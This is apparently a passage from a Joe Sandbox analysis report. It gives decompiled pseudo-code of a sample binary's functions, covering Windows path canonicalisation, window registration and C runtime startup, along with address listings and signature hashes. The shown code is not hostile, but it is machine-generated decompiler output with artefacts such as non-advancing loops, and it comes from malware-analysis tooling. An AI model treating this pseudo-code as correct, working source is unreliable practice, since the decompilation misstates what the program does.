						_t216 = 0x104;
						_a8 = 0x104;
					}
					_v12 = _t216;
					_t124 = E00762D2E(_a12,  &_v24);
					_v28 = _t124;
					if(_t124 == 0) {
						_t214 = _a12;
						_t217 = L"\\\\?\\";
						_a16 = _t190;
						_t125 = E00762815(_t214, L"\\\\?\\", 4);
						_v24 = _t125;
						if(_t125 == 0) {
							_t128 = iswalpha( *_t214 & 0x0000ffff);
							_pop(_t196);
							if(_t128 != 0 && _t214[0] == 0x3a) {
								_v24 = 1;
							}
						} else {
							_t192 =  &(_t214[2]);
							_t185 = iswalpha( *_t192 & 0x0000ffff);
							_pop(_t196);
							if(_t185 == 0 || _t214[2] != 0x3a) {
								_v24 = _v24 & 0x00000000;
							} else {
								_t214 = _t192;
							}
							_t190 = _a4;
						}
						if(_v16 == 0) {
							goto L32;
						} else {
							if(_v24 == 0) {
								goto L26;
							}
							_v20 = 4;
							_t182 = E00762A67(_t196, _t190, _a8, _t217,  &_a16,  &_v12, 0);
							goto L25;
						}
					} else {
						_push(0);
						_push( &_v12);
						_push( &_a16);
						if(_v16 == 0) {
							_push(L"\\\\");
						} else {
							_v20 = 6;
							_push(L"\\\\?\\UNC\\");
						}
						_push(_t216);
						_push(_t190);
						_t182 = E00762A67(_t195);
						_t214 = _v24;
						L25:
						_v8 = _t182;
						L26:
						if(_v16 != 0) {
							_t175 = _v20;
							if(_t175 != 0 && _a8 <= _t175 + 0x104) {
								if(_a8 > 0x104) {
									_a8 = 0x104;
								}
								_t214 = _a12;
								_v20 = _v20 & 0x00000000;
								_v12 = _a8;
								_a16 = _t190;
								_v8 = E00761AE1(_t190, _a8, E00761460);
							}
						}
						L32:
						if(_v8 < 0) {
							L79:
							E00761AE1(_t190, _a8, E00761460);
							_t121 = _v8;
							if(_t121 != 0x8007007a) {
								goto L113;
							}
							if(_v16 != 0) {
								L83:
								if(_a8 != 0x8000) {
									goto L113;
								}
								L84:
								return 0x800700ce;
							}
							if(_a8 == 0x104) {
								goto L84;
							}
							if(_v16 == 0) {
								goto L113;
							}
							goto L83;
						}
						while( *_t214 != 0) {
							_t156 = wcschr(_t214, 0x5c);
							_pop(_t203);
							_a12 = _t156;
							if(_t156 == 0) {
								_t157 = _t214;
								_t211 =  &(_t157[0]);
								do {
									_t203 =  *_t157;
									_t157 =  &(_t157[0]);
								} while (_t203 != 0);
								_t221 = _t157 - _t211 >> 1;
								L39:
								if(_t221 <= 0x100 || _v16 != 0) {
									if(_t221 >= 0x8000) {
										goto L76;
									}
									if(_t221 != 1) {
										if(_t221 != 2) {
											if(_t221 == 0 &&  *_t214 == 0x5c) {
												_t221 = _t221 + 1;
											}
											L63:
											_t163 = E00762B88(_t203, _a16, _v12, _t214, _t221,  &_a16,  &_v12, 0);
											_v8 = _t163;
											if(_t163 != 0x8007007a || _t221 != 1 ||  *_t214 != 0x5c) {
												L73:
												_t214 = _t214 + _t221 * 2;
												L74:
												if(_v8 < 0) {
													break;
												}
												continue;
											} else {
												_t164 = _t214[0] & 0x0000ffff;
												if(_t164 == 0 || _t164 == 0x2e && _t214[1] == 0) {
													_v8 = 0;
													break;
												} else {
													if(_v12 == 1 && _t164 == 0x2e && _t214[1] == _t164) {
														_a16 = _a16 + 2;
														 *_a16 = 0;
														_v12 = 0;
														_v8 = 0;
													}
													goto L73;
												}
											}
										}
										if( *_t214 != 0x2e || _t214[0] != 0x2e) {
											goto L63;
										} else {
											if(_a16 <= _t190 || E00762DA5(_t190) != 0) {
												_t166 = _a12;
												if(_t166 != 0) {
													L45:
													_t214 =  &(_t166[0]);
													goto L74;
												}
												goto L59;
											} else {
												_t170 = E0076286E(_t190, _a16 + 0xfffffffe);
												_a16 = _t170;
												_t171 = _a8;
												if(_t170 == 0) {
													_a16 = _t190;
												} else {
													_t171 = _t171 - (_a16 - _t190 >> 1);
												}
												_v12 = _t171;
												_v8 = E00761AE1(_a16, _t171, E00761460);
												L59:
												_t214 =  &(_t214[1]);
												goto L74;
											}
										}
									}
									if( *_t214 != 0x2e) {
										goto L63;
									}
									_t166 = _a12;
									if(_t166 == 0) {
										_t214 =  &(_t214[0]);
										if(_a16 > _t190 && E00762DA5(_t190) == 0) {
											_a16 = _a16 - 2;
											_v12 = _v12 + 1;
											_v8 = E00761AE1(_a16, _v12, E00761460);
										}
										goto L74;
									}
									goto L45;
								} else {
									L76:
									_v8 = 0x800700ce;
									goto L79;
								}
							}
							_t221 = _t156 - _t214 >> 1;
							goto L39;
						}
						if(_v8 >= 0) {
							_t197 = _a16;
							if(_t197 <= _t190) {
								L92:
								_t131 = _t190;
								_t208 = _t131 + 2;
								do {
									_t198 =  *_t131;
									_t131 = _t131 + 2;
								} while (_t198 != 0);
								_t218 = _t190 + (_t131 - _t208 >> 1) * 2;
								if(_t218 >= _t190 + 0xe) {
									_t220 = _t218 - 0xe;
									if(E00762815(_t220, L"::$DATA", 7) != 0) {
										 *_t220 = 0;
									}
								}
								_t136 = _v20;
								if(_t136 == 0) {
									L105:
									if(_a8 > 1 &&  *_t190 == 0) {
										_t140 = 0x5c;
										 *_t190 = _t140;
										 *((short*)(_t190 + 2)) = 0;
									}
									if(_a8 > 3 &&  *((short*)(_t190 + 2)) == 0x3a &&  *((intOrPtr*)(_t190 + 4)) == 0) {
										_t138 = 0x5c;
										 *((short*)(_t190 + 4)) = _t138;
										 *((short*)(_t190 + 6)) = 0;
									}
									return 0;
								} else {
									_t142 = _t190 + _t136 * 2;
									_t209 = _t142 + 2;
									do {
										_t199 =  *_t142;
										_t142 = _t142 + 2;
									} while (_t199 != 0);
									if(_t142 - _t209 >> 1 < 0x104) {
										if(_v28 == 0) {
											_push(_t190 + 8);
											_push(_a8);
											_push(_t190);
										} else {
											_push(_t190 + 0x10);
											_push(_a8 + 0xfffffffe);
											_push(_t190 + 4);
										}
										E00761AE1();
									}
									goto L105;
								}
							}
							_t201 = _t197;
							if( *_t201 != 0x2e) {
								goto L92;
							}
							while(_t201 != _t190) {
								_t155 = _t201 - 2;
								if( *_t155 == 0x2a) {
									goto L92;
								}
								 *_t201 = 0;
								_t201 = _t155;
								if( *_t155 != 0x2e) {
									goto L92;
								}
							}
							 *_t201 = 0;
							goto L92;
						}
						goto L79;
					}
				}
			}














































                                              0x00763171
                                              0x00763175
                                              0x00763182
                                              0x00763185
                                              0x0076318c
                                              0x0076318f
                                              0x007635cc
                                              0x007635cc
                                              0x00763195
                                              0x0076319b
                                              0x00000000
                                              0x0076319d
                                              0x007631ae
                                              0x007631b0
                                              0x007631b0
                                              0x007631b7
                                              0x007631ba
                                              0x007631bd
                                              0x007631c3
                                              0x007631c5
                                              0x007631c5
                                              0x007631cf
                                              0x007631d2
                                              0x007631d7
                                              0x007631dc
                                              0x0076320e
                                              0x00763213
                                              0x0076321a
                                              0x0076321d
                                              0x00763222
                                              0x00763227
                                              0x00763259
                                              0x0076325f
                                              0x00763262
                                              0x0076326d
                                              0x0076326d
                                              0x00763229
                                              0x0076322b
                                              0x00763232
                                              0x00763238
                                              0x0076323b
                                              0x0076324a
                                              0x00763246
                                              0x00763246
                                              0x00763246
                                              0x0076324e
                                              0x0076324e
                                              0x00763278
                                              0x00000000
                                              0x0076327a
                                              0x0076327e
                                              0x00000000
                                              0x00000000
                                              0x0076328e
                                              0x00763296
                                              0x00000000
                                              0x00763296
                                              0x007631de
                                              0x007631de
                                              0x007631e2
                                              0x007631e6
                                              0x007631ea
                                              0x00763207
                                              0x007631ec
                                              0x007631ec
                                              0x007631f3
                                              0x007631f3
                                              0x007631f8
                                              0x007631f9
                                              0x007631fa
                                              0x007631ff
                                              0x0076329b
                                              0x0076329b
                                              0x0076329e
                                              0x007632a2
                                              0x007632a4
                                              0x007632a9
                                              0x007632bd
                                              0x007632bf
                                              0x007632bf
                                              0x007632c5
                                              0x007632c8
                                              0x007632d3
                                              0x007632d6
                                              0x007632de
                                              0x007632de
                                              0x007632a9
                                              0x007632e1
                                              0x007632e5
                                              0x00763496
                                              0x0076349f
                                              0x007634a4
                                              0x007634ac
                                              0x00000000
                                              0x00000000
                                              0x007634b6
                                              0x007634cb
                                              0x007634d2
                                              0x00000000
                                              0x00000000
                                              0x007634d8
                                              0x00000000
                                              0x007634d8
                                              0x007634bf
                                              0x00000000
                                              0x00000000
                                              0x007634c5
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x007634c5
                                              0x007632eb
                                              0x007632f8
                                              0x007632ff
                                              0x00763300
                                              0x00763305
                                              0x0076330f
                                              0x00763311
                                              0x00763314
                                              0x00763314
                                              0x00763318
                                              0x00763319
                                              0x00763322
                                              0x00763324
                                              0x0076332a
                                              0x0076333c
                                              0x00000000
                                              0x00000000
                                              0x00763345
                                              0x0076339b
                                              0x00763406
                                              0x0076340e
                                              0x0076340e
                                              0x0076340f
                                              0x00763421
                                              0x00763426
                                              0x0076342e
                                              0x00763476
                                              0x00763476
                                              0x00763479
                                              0x0076347d
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0076343b
                                              0x0076343b
                                              0x00763444
                                              0x0076348d
                                              0x00000000
                                              0x00763452
                                              0x00763456
                                              0x00763469
                                              0x0076346d
                                              0x00763470
                                              0x00763473
                                              0x00763473
                                              0x00000000
                                              0x00763456
                                              0x00763444
                                              0x0076342e
                                              0x007633a1
                                              0x00000000
                                              0x007633aa
                                              0x007633ad
                                              0x007633f4
                                              0x007633f9
                                              0x00763358
                                              0x00763358
                                              0x00000000
                                              0x00763358
                                              0x00000000
                                              0x007633b9
                                              0x007633c1
                                              0x007633c6
                                              0x007633cb
                                              0x007633ce
                                              0x007633db
                                              0x007633d0
                                              0x007633d7
                                              0x007633d7
                                              0x007633e7
                                              0x007633ef
                                              0x007633ff
                                              0x007633ff
                                              0x00000000
                                              0x007633ff
                                              0x007633ad
                                              0x007633a1
                                              0x0076334b
                                              0x00000000
                                              0x00000000
                                              0x00763351
                                              0x00763356
                                              0x00763361
                                              0x00763365
                                              0x00763379
                                              0x0076337d
                                              0x00763390
                                              0x00763390
                                              0x00000000
                                              0x00763365
                                              0x00000000
                                              0x00763484
                                              0x00763484
                                              0x00763484
                                              0x00000000
                                              0x00763484
                                              0x0076332a
                                              0x0076330b
                                              0x00000000
                                              0x0076330b
                                              0x00763494
                                              0x007634e2
                                              0x007634e7
                                              0x00763512
                                              0x00763512
                                              0x00763514
                                              0x00763517
                                              0x00763517
                                              0x0076351b
                                              0x0076351c
                                              0x00763525
                                              0x0076352d
                                              0x00763536
                                              0x00763541
                                              0x00763545
                                              0x00763545
                                              0x00763541
                                              0x00763548
                                              0x0076354f
                                              0x0076358f
                                              0x00763593
                                              0x0076359c
                                              0x0076359d
                                              0x007635a2
                                              0x007635a2
                                              0x007635aa
                                              0x007635bb
                                              0x007635bc
                                              0x007635c2
                                              0x007635c2
                                              0x00000000
                                              0x00763551
                                              0x00763551
                                              0x00763554
                                              0x00763557
                                              0x00763557
                                              0x0076355b
                                              0x0076355c
                                              0x0076356a
                                              0x0076356f
                                              0x00763585
                                              0x00763586
                                              0x00763589
                                              0x00763571
                                              0x00763574
                                              0x0076357b
                                              0x0076357f
                                              0x0076357f
                                              0x0076358a
                                              0x0076358a
                                              0x00000000
                                              0x0076356a
                                              0x0076354f
                                              0x007634ea
                                              0x007634ef
                                              0x00000000
                                              0x00000000
                                              0x007634f1
                                              0x007634f5
                                              0x007634fc
                                              0x00000000
                                              0x00000000
                                              0x00763500
                                              0x00763507
                                              0x00763509
                                              0x00000000
                                              0x00000000
                                              0x0076350b
                                              0x0076350f
                                              0x00000000
                                              0x0076350f
                                              0x00000000
                                              0x00763494
                                              0x007631dc

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: wcschr
                                              • String ID: ::$DATA$\\?\$\\?\UNC\
                                              • API String ID: 1497570035-1379090233
                                              • Opcode ID: 02bd72f5a06e988ea3f8d3300d1c8a1f13748dc1ac81312eae509b73460745d4
                                              • Instruction ID: 0a82863888dcd261f5774c49bf756bd9816a52195c6f55551fd893e8728a24f4
                                              • Opcode Fuzzy Hash: 02bd72f5a06e988ea3f8d3300d1c8a1f13748dc1ac81312eae509b73460745d4
                                              • Instruction Fuzzy Hash: 64E1607190024AEACF21DF64C844AAEBBB4FF05354F54812AEC17AB181E77C9F90CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00762FD3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00762FD3(void* __ebx, wchar_t* _a4, signed int* _a8) {
				signed int* _t16;
				int _t19;
				int _t20;
				int _t22;
				signed short* _t25;
				wchar_t* _t27;
				intOrPtr* _t32;
				wchar_t* _t37;
				wchar_t* _t39;
				int _t43;
				int _t46;
				long* _t47;
				void* _t48;
				void* _t49;
				intOrPtr* _t50;
				signed short* _t51;
				signed short* _t52;

				_t51 = _a4;
				if(_t51 == 0 ||  *_t51 == 0) {
					L28:
					return 0x80070057;
				} else {
					_t16 = _a8;
					if(_t16 == 0) {
						goto L28;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(E00762D2E(_t51,  &_a4) == 0) {
						_t49 = 0x5c;
						__eflags =  *_t51 - _t49;
						if(__eflags != 0) {
							L19:
							_t19 = E00762963(__eflags, _t51);
							__eflags = _t19;
							if(_t19 == 0) {
								_t20 = E00762815(_t51, L"\\\\?\\", 4);
								__eflags = _t20;
								if(_t20 != 0) {
									_t51 =  &(_t51[4]);
									__eflags = _t51;
								}
								_t22 = iswalpha( *_t51 & 0x0000ffff);
								__eflags = _t22;
								if(_t22 == 0) {
									goto L28;
								} else {
									__eflags = _t51[1] - 0x3a;
									if(_t51[1] != 0x3a) {
										goto L28;
									}
									_t52 =  &(_t51[2]);
									__eflags = _t52;
									L26:
									__eflags =  *_t52 - _t49;
									if( *_t52 == _t49) {
										_t52 =  &(_t52[1]);
									}
									L9:
									 *_a8 = _t52;
									return 0;
								}
							}
							_t52 =  &(_t51[0x30]);
							goto L26;
						}
						_t25 =  &(_t51[1]);
						__eflags =  *_t25 - _t49;
						if(__eflags == 0) {
							goto L19;
						}
						_t52 = _t25;
						goto L9;
					}
					_t37 = _a4;
					_t50 = wcschr(_t37, 0x5c);
					if(_t50 == 0) {
						_t27 = _t37;
						_t47 =  &(_t27[0]);
						do {
							_t43 =  *_t27;
							_t27 =  &(_t27[0]);
							__eflags = _t43;
						} while (_t43 != 0);
						_t52 = _t37 + (_t27 - _t47 >> 1) * 2;
						L8:
						goto L9;
					}
					_t5 = _t50 + 2; // 0x2
					_t39 = _t5;
					_t52 = wcschr(_t39, 0x5c);
					if(_t52 == 0) {
						_t32 = _t50;
						_t7 = _t32 + 2; // 0x2
						_t48 = _t7;
						do {
							_t46 =  *_t32;
							_t32 = _t32 + 2;
							__eflags = _t46;
						} while (_t46 != 0);
						_t52 = _t50 + (_t32 - _t48 >> 1) * 2;
					} else {
						if(_t52 != _t39) {
							_t52 =  &(_t52[1]);
						}
					}
					goto L8;
				}
			}




















                                              0x00762fd9
                                              0x00762fdf
                                              0x007630d5
                                              0x00000000
                                              0x00762fef
                                              0x00762fef
                                              0x00762ff4
                                              0x00000000
                                              0x00000000
                                              0x00762ffa
                                              0x00763009
                                              0x00763077
                                              0x00763078
                                              0x0076307b
                                              0x00763089
                                              0x0076308a
                                              0x0076308f
                                              0x00763091
                                              0x007630a0
                                              0x007630a5
                                              0x007630a7
                                              0x007630a9
                                              0x007630a9
                                              0x007630a9
                                              0x007630b0
                                              0x007630b7
                                              0x007630b9
                                              0x00000000
                                              0x007630bb
                                              0x007630bb
                                              0x007630c0
                                              0x00000000
                                              0x00000000
                                              0x007630c2
                                              0x007630c2
                                              0x007630c5
                                              0x007630c5
                                              0x007630c8
                                              0x007630cf
                                              0x007630cf
                                              0x00763039
                                              0x0076303c
                                              0x00000000
                                              0x0076303e
                                              0x007630b9
                                              0x00763093
                                              0x00000000
                                              0x00763093
                                              0x0076307d
                                              0x00763080
                                              0x00763083
                                              0x00000000
                                              0x00000000
                                              0x00763085
                                              0x00000000
                                              0x00763085
                                              0x00763012
                                              0x0076301a
                                              0x00763020
                                              0x0076305d
                                              0x0076305f
                                              0x00763062
                                              0x00763062
                                              0x00763066
                                              0x00763067
                                              0x00763067
                                              0x00763070
                                              0x00763038
                                              0x00000000
                                              0x00763038
                                              0x00763022
                                              0x00763022
                                              0x0076302a
                                              0x00763030
                                              0x00763045
                                              0x00763047
                                              0x00763047
                                              0x0076304a
                                              0x0076304a
                                              0x0076304e
                                              0x0076304f
                                              0x0076304f
                                              0x00763058
                                              0x00763032
                                              0x00763034
                                              0x00763037
                                              0x00763037
                                              0x00763034
                                              0x00000000
                                              0x00763030

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: wcschr$iswalpha
                                              • String ID: \\?\
                                              • API String ID: 934781262-4282027825
                                              • Opcode ID: 52e3167332966b1e652e2cfddb16ca6973188133fce8cd4af4152dcc586112d1
                                              • Instruction ID: f9f0f52bb96a282e1bef18b48eaf07490bd1f7f0683819d82f3a2c765733a113
                                              • Opcode Fuzzy Hash: 52e3167332966b1e652e2cfddb16ca6973188133fce8cd4af4152dcc586112d1
                                              • Instruction Fuzzy Hash: 6F31E73AA00616E7E7259E58CC44AA773AAEB057A0B154016ED47DB180EB7CDF4DC7E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007613B9 Relevance: 6.1, APIs: 4, Instructions: 51registrywindowCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E007613B9(struct HINSTANCE__* _a4, WCHAR* _a8) {
				struct _WNDCLASSW _v44;
				struct HICON__* _t17;
				WCHAR* _t22;
				signed int _t23;
				struct HINSTANCE__* _t27;

				_t23 = 9;
				_v44.style = 0;
				memset( &(_v44.lpfnWndProc), 0, _t23 << 2);
				_t27 = _a4;
				_v44.lpfnWndProc = E0076119B;
				_v44.hInstance = _t27;
				_v44.hIcon = LoadIconW(_t27, 0x64);
				_t17 = LoadCursorW(0, 0x7f00);
				_t22 = _a8;
				_v44.hCursor = _t17;
				_v44.hbrBackground = 6;
				_v44.cbWndExtra = 4;
				_v44.lpszClassName = _t22;
				RegisterClassW( &_v44);
				return CreateWindowExW(0x80, _t22, E00761460, 0, 0x80000000, 0x80000000, 0, 0, 0, 0, _t27, 0);
			}








                                              0x007613c6
                                              0x007613cb
                                              0x007613d1
                                              0x007613d3
                                              0x007613d9
                                              0x007613e0
                                              0x007613ef
                                              0x007613f2
                                              0x007613f8
                                              0x007613fb
                                              0x00761402
                                              0x00761409
                                              0x00761410
                                              0x00761413
                                              0x0076143c

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: Load$ClassCreateCursorIconRegisterWindow
                                              • String ID:
                                              • API String ID: 1446224504-0
                                              • Opcode ID: 34a04263806a684ea14649ca9d911f1a62f21b449a313e6c32e62bc6b5ca3dca
                                              • Instruction ID: 0b2902c7c2bb2d155a7532998f75a84c2d494c958d637b8cffaa93a71d669bf9
                                              • Opcode Fuzzy Hash: 34a04263806a684ea14649ca9d911f1a62f21b449a313e6c32e62bc6b5ca3dca
                                              • Instruction Fuzzy Hash: 790169B2901219BFDB108F969C4DEDFBFBCEB49760F148016FA06A6240D6B85940CBF4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00761C9C Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00761C9C() {
				signed int _t10;
				void* _t15;
				intOrPtr _t18;
				intOrPtr* _t19;
				signed int _t25;
				signed int _t26;
				void* _t28;
				intOrPtr _t32;

				_t28 =  *0x760000 - 0x5a4d; // 0x5a4d
				if(_t28 != 0) {
					L8:
					_t10 = 0;
				} else {
					_t18 =  *0x76003c; // 0xd8
					_t1 = _t18 + 0x760000; // 0x4550
					_t19 = _t1;
					if( *_t19 != 0x4550) {
						goto L8;
					} else {
						_t25 =  *(_t19 + 0x18) & 0x0000ffff;
						if(_t25 != 0x10b) {
							if(_t25 != 0x20b ||  *((intOrPtr*)(_t19 + 0x84)) <= 0xe) {
								goto L8;
							} else {
								_t26 = 0;
								goto L5;
							}
						} else {
							if( *((intOrPtr*)(_t19 + 0x74)) <= 0xe) {
								goto L8;
							} else {
								_t26 = 0;
								_t32 =  *((intOrPtr*)(_t19 + 0xe8));
								L5:
								_t10 = _t26 & 0xffffff00 | _t32 != 0x00000000;
							}
						}
					}
				}
				 *0x765050 = _t10;
				__set_app_type(E00761D5E(2));
				 *0x76505c =  *0x76505c | 0xffffffff;
				 *0x765060 =  *0x765060 | 0xffffffff;
				 *(__p__fmode()) =  *0x7653ac;
				 *(__p__commode()) =  *0x7653a8;
				_t15 = E0076158B();
				if( *0x76539c == 0) {
					__setusermatherr(E0076158B);
				}
				E00761D46(_t15);
				return 0;
			}











                                              0x00761ca1
                                              0x00761ca8
                                              0x00761d3d
                                              0x00761d3d
                                              0x00761cae
                                              0x00761cae
                                              0x00761cb3
                                              0x00761cb3
                                              0x00761cbf
                                              0x00000000
                                              0x00761cc1
                                              0x00761cc1
                                              0x00761ccb
                                              0x0076250e
                                              0x00000000
                                              0x00762521
                                              0x00762521
                                              0x00000000
                                              0x00762523
                                              0x00761cd1
                                              0x00761cd5
                                              0x00000000
                                              0x00761cd7
                                              0x00761cd7
                                              0x00761cd9
                                              0x00761cdf
                                              0x00761ce2
                                              0x00761ce2
                                              0x00761cd5
                                              0x00761ccb
                                              0x00761cbf
                                              0x00761ce6
                                              0x00761cf1
                                              0x00761cf7
                                              0x00761cfe
                                              0x00761d13
                                              0x00761d21
                                              0x00761d23
                                              0x00761d2f
                                              0x00762533
                                              0x00762539
                                              0x00761d35
                                              0x00761d3c

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: __p__commode__p__fmode__set_app_type
                                              • String ID:
                                              • API String ID: 3338496922-0
                                              • Opcode ID: 4d2bc0ac04215885bb50df246d60a41bfddda2fba59500700d3f7b32b801f216
                                              • Instruction ID: b77e2fb812ae2c6d009712799a461b08af99ab35d7a775817da716b7d2e5344d
                                              • Opcode Fuzzy Hash: 4d2bc0ac04215885bb50df246d60a41bfddda2fba59500700d3f7b32b801f216
                                              • Instruction Fuzzy Hash: BF1133B0605705CFC7285B30D85D66837A0FB02711F99C67AE957866F1D7BC8880DF14
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00762DA5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00762DA5(signed short* _a4) {
				long _t12;
				int _t13;
				signed short* _t15;
				signed short* _t17;
				signed int _t24;
				signed short* _t30;
				void* _t32;
				void* _t33;
				signed short* _t34;

				_t34 = _a4;
				if(_t34 == 0) {
					L21:
					__eflags = 0;
					return 0;
				}
				_t12 =  *_t34 & 0x0000ffff;
				if(_t12 == 0) {
					goto L21;
				}
				_t13 = iswalpha(_t12);
				_t33 = E00762E84;
				if(_t13 == 0 || E00762815( &(_t34[1]), E00762E84, 3) == 0) {
					__eflags =  *_t34 - 0x5c;
					if( *_t34 != 0x5c) {
						L7:
						_t15 = E00762D2E(_t34,  &_a4);
						__eflags = _t15;
						if(_t15 == 0) {
							__eflags = E00762815(_t34, L"\\\\?\\", 4);
							if(__eflags == 0) {
								L18:
								_t17 = E00762963(__eflags, _t34);
								__eflags = _t17;
								if(_t17 == 0) {
									goto L21;
								}
								__eflags = _t34[0x30] - 0x5c;
								if(_t34[0x30] != 0x5c) {
									goto L21;
								}
								__eflags = _t34[0x31];
								if(_t34[0x31] == 0) {
									goto L4;
								}
								goto L21;
							}
							__eflags = iswalpha(_t34[4] & 0x0000ffff);
							if(__eflags == 0) {
								goto L18;
							}
							__eflags = E00762815( &(_t34[5]), _t33, 3);
							if(__eflags != 0) {
								goto L4;
							}
							goto L18;
						}
						_t30 = _a4;
						_t32 = 0;
						while(1) {
							_t24 =  *_t30 & 0x0000ffff;
							__eflags = _t24;
							if(_t24 == 0) {
								goto L4;
							}
							__eflags = _t24 - 0x5c;
							if(_t24 != 0x5c) {
								L12:
								_t30 =  &(_t30[1]);
								__eflags = _t30;
								continue;
							}
							_t32 = _t32 + 1;
							__eflags = _t32 - 1;
							if(_t32 > 1) {
								goto L21;
							}
							__eflags = _t30[1];
							if(_t30[1] == 0) {
								goto L21;
							}
							goto L12;
						}
						goto L4;
					}
					__eflags = _t34[1];
					if(_t34[1] == 0) {
						goto L4;
					}
					goto L7;
				} else {
					L4:
					return 1;
				}
			}












                                              0x00762dac
                                              0x00762db2
                                              0x00762e79
                                              0x00762e79
                                              0x00000000
                                              0x00762e79
                                              0x00762db8
                                              0x00762dbe
                                              0x00000000
                                              0x00000000
                                              0x00762dcb
                                              0x00762dce
                                              0x00762dd5
                                              0x00762def
                                              0x00762df3
                                              0x00762dfc
                                              0x00762e01
                                              0x00762e06
                                              0x00762e08
                                              0x00762e3d
                                              0x00762e3f
                                              0x00762e5d
                                              0x00762e5e
                                              0x00762e63
                                              0x00762e65
                                              0x00000000
                                              0x00000000
                                              0x00762e67
                                              0x00762e6c
                                              0x00000000
                                              0x00000000
                                              0x00762e6e
                                              0x00762e73
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00762e73
                                              0x00762e49
                                              0x00762e4b
                                              0x00000000
                                              0x00000000
                                              0x00762e59
                                              0x00762e5b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00762e5b
                                              0x00762e0a
                                              0x00762e0d
                                              0x00762e26
                                              0x00762e26
                                              0x00762e29
                                              0x00762e2c
                                              0x00000000
                                              0x00000000
                                              0x00762e11
                                              0x00762e15
                                              0x00762e24
                                              0x00762e25
                                              0x00762e25
                                              0x00000000
                                              0x00762e25
                                              0x00762e17
                                              0x00762e18
                                              0x00762e1b
                                              0x00000000
                                              0x00000000
                                              0x00762e1d
                                              0x00762e22
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00762e22
                                              0x00000000
                                              0x00762e26
                                              0x00762df5
                                              0x00762dfa
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00762de7
                                              0x00762de7
                                              0x00000000
                                              0x00762de9

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: iswalpha
                                              • String ID: \\?\
                                              • API String ID: 2011389249-4282027825
                                              • Opcode ID: 4cce5e3bb56fbb70c76a56fedf99cd492c8c4b7cc48340c4975287173622b8fd
                                              • Instruction ID: d0c68ca84d9a20b2a15682f3cc12c6b721a4ace713d158a67eb143b1870c206a
                                              • Opcode Fuzzy Hash: 4cce5e3bb56fbb70c76a56fedf99cd492c8c4b7cc48340c4975287173622b8fd
                                              • Instruction Fuzzy Hash: 0421F535600F02A5EAB46665DC4CAB732ECAF44790B14843EED83D6087E72DC883C164
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00761467 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 37%
                                              			E00761467(void* __ecx, void* _a4) {
				char _v8;
				intOrPtr _t17;
				signed int _t18;
				intOrPtr _t29;

				_t17 =  *[fs:0x18];
				_t29 =  *((intOrPtr*)(_t17 + 0x30));
				RtlImageNtHeader(_a4);
				if( *((short*)(_t17 + 0x14)) != 0 &&  *(_t17 + 0x4c) != 0) {
					 *(_t29 + 0xa4) =  *(_t17 + 0x4c) & 0x000000ff;
